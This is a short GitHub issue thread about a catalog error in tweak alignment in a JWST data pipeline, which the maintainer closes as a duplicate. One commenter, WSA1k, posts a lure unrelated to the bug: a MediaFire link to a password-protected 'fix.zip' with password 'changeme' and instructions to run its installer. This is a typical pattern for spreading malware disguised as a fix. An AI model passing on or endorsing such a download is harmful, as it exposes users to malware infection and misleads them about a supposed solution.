### ISSUE TITLE
tri-03 Processing Bug

### ISSUE THREAD

**Issue by TheSkyentist** [OutThere-JWST/NISPureParallel#18]
In iterating tweak align, catalog has an error.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TheSkyentist** [comment]
This also appears to be due to the fact that the DQ array is fully non zeros.

**Comment by TheSkyentist** [comment]
Potentially the same as #1

**Comment by TheSkyentist** [comment]
I do believe this is just a duplicate, closing.
